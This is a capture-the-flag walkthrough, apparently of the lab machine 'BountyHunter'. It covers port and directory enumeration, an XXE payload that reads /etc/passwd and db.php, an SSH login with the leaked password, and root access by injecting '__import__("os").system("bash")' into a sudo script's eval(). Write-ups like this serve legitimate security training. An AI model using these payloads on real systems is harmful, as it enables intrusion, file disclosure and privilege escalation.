BountyHounter

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.11.100 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Fri Jun 24 12:23:35 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up (0.067s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Fri Jun 24 12:23:48 2022 -- 1 IP address (1 host up) scanned in 13.45 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,8065 10.10.11.100 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Fri Jun 24 12:24:02 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.11.100
Nmap scan report for 10.10.11.100
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 24 12:24:35 2022 -- 1 IP address (1 host up) scanned in 33.22 seconds

If we take a look at the website, we'll see a basic website with irrelevant information.

Let's try to enumerate subdirectories with gobuster.

gobuster dir -u http://10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x txt,php

dir enumerates directories or files.
-u the target URL.
-w path to the wordlist.
-t number of current threads, in this case 200 threads.
-x file extensions to search for.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.100
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/06/24 14:57:07 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/portal.php           (Status: 200) [Size: 125]                                  
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]   
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]    
/db.php               (Status: 200) [Size: 0]                                    
                                                                                 
===============================================================
2022/06/24 15:00:19 Finished
===============================================================

If we take a look at the /portal.php directory, we'll see a message saying that the portal is under development, and it shows another page in /log_submit.php.

Let's take a look at the /log_submit.php page.

Let's try to fill of the input fields with the test word and hit on Submit.

Exploitation

It looks like the input is being represented by the server in the server response. Let's take a look at how the requests are being made. Intercept the request with BurpSuite, and send it to the repeater.

The POST request is sending a URL and Base64 encoded message. We can decode the message in BurpSuite by selecting the entire message, and pressing Ctrl+Shift+U to URL decoded it, and then Ctrl+Shift+B to base64 decode it. We should see an XML message.

At this point, we could try to do an XXE attack.

The XXE attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

In order to get the /etc/passwd file, we could create an external entity which will load a specific file.

<?xml  version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

  <!ELEMENT foo ANY >

  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
		<bugreport>
		<title>&xxe;</title>
		<cwe>test</cwe>
		<cvss>test</cvss>
		<reward>test</reward>
		</bugreport>

If now we encode it to base64 with Ctrl+B and then encode it to URL with Ctrl+U, and then send the request, we should see the /etc/passwd file in the server response.

Now, we could see the content of the db.php file which we found on the subdirectories enumeration with gobuster. We'll have to use the wrapper php://filter/convert.base64-encode/resource=db.php so we get the content of the file base64 encoded.

data=<?xml  version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

  <!ELEMENT foo ANY >

  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php" >]>
		<bugreport>
		<title>&xxe;</title>
		<cwe>test</cwe>
		<cvss>test</cvss>
		<reward>test</reward>
		</bugreport>

If we decode the base64 string in the server response, we'll see some credentials.

Now, we could try to log in via SSH with the user development we found in the /etc/passwd file, and the password m19RoAU0hP41A1sTsq6K. Then, we could grab the user flag.

sshpass -p 'm19RoAU0hP41A1sTsq6K' ssh development@10.10.11.100

Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 24 Jun 2022 01:54:11 PM UTC

  System load:           0.0
  Usage of /:            24.2% of 6.83GB
  Memory usage:          16%
  Swap usage:            0%
  Processes:             214
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.100
  IPv6 address for eth0: dead:beef::250:56ff:feb9:5f4b


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Jul 21 12:04:13 2021 from 10.10.14.8
development@bountyhunter:~$ cat user.txt 
e3251651591eaaceefd492d9007cb7cc

Privilege Escalation

If we take a look at the sudo permissions, we'll see that we can execute a script with Python3.8 as the root user.

sudo -l

Matching Defaults entries for development on bountyhunter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

Let's see the script permissions.

ls -l /opt/skytrain_inc/ticketValidator.py

-r-xr--r-- 1 root root 1471 Jul 22  2021 /opt/skytrain_inc/ticketValidator.py

We can only read the script. Let's take a look at it.

#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

Basically, the script is reading a file. That file should have the .md extensions, and it should start with the following lines.

# Skytrain Inc
## Ticket to 
__Ticket Code:__

The next line should be ** followed by a number that if divided by 7, the remainder should be 4, for example the 11. Then it should end with a + sign followed by a random number.

**11+

Then, the script uses the eval() function. We could exploit this function, so when we execute the script, we will get a shell as root. The final test.md file should look like this.

# Skytrain Inc
## Ticket to 
__Ticket Code:__
**11+8 and __import__("os").system("bash")

If we execute the script with sudo privileges, and indicate the test.md file, we should get a shell as the root user. And then all we have to do is reap the harvest and take the root flag.

sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

Please enter the path to the ticket file.
test.md
Destination: 
root@bountyhunter:/home/development# whoami
root
root@bountyhunter:/home/development# id
uid=0(root) gid=0(root) groups=0(root)
root@bountyhunter:/home/development# cat /root/root.txt 
2b946c05b9ee9aea25eab3754353be74

Last updated 2 years ago

Was this helpful?

hashtagEnumeration

hashtagExploitation

hashtagPrivilege Escalation

Enumeration

Exploitation

Privilege Escalation